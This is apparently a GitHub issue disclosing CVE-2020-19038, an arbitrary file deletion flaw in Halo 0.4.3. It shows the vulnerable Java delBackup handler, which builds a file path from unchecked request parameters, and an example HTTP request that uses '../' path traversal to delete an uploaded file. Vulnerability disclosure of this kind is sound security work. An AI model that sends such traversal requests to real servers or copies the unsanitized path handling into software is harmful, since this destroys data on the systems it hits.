Headline
CVE-2020-19038: Any file deletion in the background · Issue #136 · halo-dev/halo
File Deletion vulnerability in Halo 0.4.3 via delBackup.
我确定我已经查看了 (标注[ ]为[x])
- Halo 使用文档
- Github Wiki 常见问题
- 其他 Issues
我要申请 (标注[ ]为[x])
- BUG 反馈
- 添加新的特性或者功能
- 请求技术支持
There is an arbitrary file deletion vulnerability in the backup file deletion.
@GetMapping(value = "delBackup")
@ResponseBody
public JsonResult delBackup(@RequestParam("fileName") String fileName,
@RequestParam("type") String type) {
final String srcPath = System.getProperties().getProperty("user.home") + "/halo/backup/" + type + "/" + fileName;
try {
FileUtil.del(srcPath);
return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-success"));
} catch (Exception e) {
return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-failed"));
}
}
eg.
GET /admin/backup/delBackup?type=posts&fileName=../../upload/2019/3/veer-15238236420190404102850332.jpg HTTP/1.1
Host: demo.halo.run
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Referer: https://demo.halo.run/admin/backup?type=posts
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=jLIF44HA_8IHwVFhq66-jAArsdL3Mtz_tg2GvNhO
The vulnerability discoverer by Chaitin Tech.